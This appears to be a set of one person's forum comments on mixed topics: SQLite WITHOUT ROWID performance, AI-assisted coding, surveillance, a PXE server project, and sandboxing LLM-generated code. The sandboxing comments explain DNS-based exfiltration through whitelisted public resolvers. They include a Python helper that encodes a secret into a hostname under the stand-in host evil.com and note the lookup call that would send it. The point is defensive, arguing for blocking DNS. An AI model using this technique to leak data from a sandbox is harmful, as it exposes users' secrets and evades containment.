- Historically, tinkerers had to stay within an extremely limited scope of what they knew well enough to enjoy working on.
AI changes that. If someone wants to code in a new area, it's 10000000x easier to get started.
What if the # of handwritten lines of code is actually increasing with AI usage?
- The website claims it’s 10x cheaper (“10x faster on same hardware costs”) and implements SQL execution.
I don’t understand why GPU saturation is relevant. If it’s 10x cheaper, it doesn’t matter if you only use 0.1% of the GPU, right?
Correctness shouldn’t be a concern if it implements SQL.
Curious for some more details, maybe there’s something I’m missing.
- Did you try WITHOUT ROWID? Your sqlite implementation[1] uses a BLOB primary key. In SQLite, this means each operation requires 2 b-tree traversals: The BLOB->rowid tree and the rowid->data tree.
If you use WITHOUT ROWID, you traverse only the BLOB->data tree.
Looking up lexicographically similar keys gets a huge performance boost since sqlite can scan a B-Tree node and the data is contiguous. Your current implementation is chasing pointers to random locations in a different b-tree.
I'm not sure whether the on-disk size would get smaller or larger. It probably depends on the key and value sizes compared to the 64-bit rowids. This is probably a well-studied question you could find the answer to.
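A minimal sketch of the two layouts (table and column names here are hypothetical, not from the garage schema), using Python's built-in sqlite3:

```python
import sqlite3

con = sqlite3.connect(":memory:")

# Default (rowid) table: SQLite stores rows in a rowid b-tree, and the
# BLOB primary key lives in a separate index b-tree mapping key -> rowid,
# so a point lookup traverses two trees.
con.execute("CREATE TABLE kv (k BLOB PRIMARY KEY, v BLOB)")

# WITHOUT ROWID: a single b-tree keyed directly on the BLOB, so a lookup
# is one traversal and a range scan over lexicographically similar keys
# reads neighboring entries in the same tree.
con.execute("CREATE TABLE kv_wr (k BLOB PRIMARY KEY, v BLOB) WITHOUT ROWID")

for t in ("kv", "kv_wr"):
    con.executemany(
        f"INSERT INTO {t} VALUES (?, ?)",
        [(b"user:1", b"a"), (b"user:2", b"b"), (b"post:1", b"c")],
    )

# Prefix scan: contiguous in the WITHOUT ROWID tree, pointer-chasing
# through a second b-tree in the rowid case.
rows = con.execute(
    "SELECT k FROM kv_wr WHERE k >= ? AND k < ? ORDER BY k",
    (b"user:", b"user;"),
).fetchall()
```

Same query, same results either way; the difference is purely how many b-tree pages get touched per lookup.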
[1]: https://git.deuxfleurs.fr/Deuxfleurs/garage/src/commit/4efc8...
- > During his time as the Executive Director of the American Peanut Shellers, John helped to found the Peanut Institute and the U.S. Peanut Federation. These two entities have helped to promote the interests of the peanut industry throughout the United States and the world. Moreover, John has worked on eight farm bills during his life, always advocating for those who he represented. Since 2001, John, in association with the National Peanut Board, has helped to steer more than 36 million dollars to food allergy research, outreach and education. Earlier this year, because of his significant contributions to the Peanut Industry, John was inducted into the American Peanut Council Hall of Fame.
- Not just the LLM, but any code that the LLM outputs also has to be firewalled.
Sandboxing your LLM but then executing whatever it wants in your web browser defeats the point. CORS does not help.
Also, the firewall has to block most DNS traffic, otherwise the model could query `A <secret>.evil.com` and Google/Cloudflare servers (along with everybody else) will forward the query to evil.com. Secure DNS, therefore, also can't be allowed.
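To illustrate the mechanism (domain name and helper are hypothetical): the sandboxed code never needs to reach evil.com directly, because whatever whitelisted resolver it is allowed to use will forward the query for it.

```python
import base64

def exfil_hostname(secret: bytes, domain: str = "evil.com") -> str:
    # base32 keeps the payload within DNS's allowed label alphabet;
    # a label is limited to 63 bytes, so larger secrets would be chunked
    # across multiple queries.
    label = base64.b32encode(secret).decode().rstrip("=").lower()
    assert len(label) <= 63
    return f"{label}.{domain}"

# socket.getaddrinfo(exfil_hostname(b"api_key"), 80) would emit the query;
# the recursive resolver (1.1.1.1, 8.8.8.8, ...) then contacts evil.com's
# authoritative nameserver, delivering the secret.
```

This is why allowing "just DNS" through the firewall is already a full exfiltration channel.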
katakate[1] is still incomplete, but something like it is the solution here: run the LLM and its code in firewalled VMs.
- Isn’t there precedent for many other governments secretly or openly doing exactly this? Snowden etc?
There’s an arms race element to this that I don’t see people discussing.
Do EU citizens have any privacy from US tech? Is there anything to protect?
Do we want the USA to have exclusive right to spy on the world?
Is it better to have 1 Big Brother or 10?
- 2014 interview with the creator: https://spacing.ca/toronto/2014/08/13/meet-bertie-brain-worl...
- > One thing I could do is make it exposed in config, to allow the user to block all DNS resolutions until Cilium is integrated. LMK if desired!
Yes, but it's not great for it to be an optional config option. Trivially easy to use data exfiltration methods shouldn't be possible at all in a tool like this, let alone enabled by default.
I want to be able to recommend that people try this out without having to walk them through the 5 different options they need to configure for it to actually be safe. That ends up defeating the purpose of the tool, in my opinion.
Some use cases will require mitmproxy whitelists as well, e.g. deny pulling container images by default except those matching the container whitelist.
This is basically a wide-open network policy as far as data exfiltration goes, right?

    name: project-build
    image: alpine:latest
    namespace: default
    egress_whitelist:
      - "1.1.1.1/32" # Cloudflare DNS
      - "8.8.8.8/32" # Google DNS

Malicious code just has to resolve <secret>.evil.com and Google/CF will forward that query to evil.com's resolver.
- It’s not a DHCP server the way you’re thinking. Pxehost only replies with a couple of fields for PXE boot, and only to clients that declare themselves as PXE boot clients. It doesn’t interfere with the normal DHCP server: the PXE client will get 2 broadcast replies, one from pxehost and one from the DHCP server, and will combine the info.
- I vibe coded the site for pxehost - https://pxehost.com
The text content is largely hand written but the style/structures/etc are vibes.
Codex CLI on the $20 Plus plan.
The first shot was remarkably similar to the end result, but there was lots of tweaking and testing.
The website https://pxehost.com - via codex CLI
The actual project itself (a PXE server written in Go that works on macOS) - https://github.com/pxehost/pxehost - ChatGPT produced the working v1 of this in 1 message.
There was much tweaking, testing, refactoring (often manually) before releasing it.
Where AI helps is the fact that it’s possible to try 10-20 different such prototypes per day.
The end result is 1) Much more handwritten code gets produced because when I get a working prototype I usually want to go over every detail personally; 2) I can write code across much more diverse technologies; 3) The code is better, because each of its components are the best of many attempts, since attempts are so cheap.
I can give more if you like, but hope that is what you are looking for.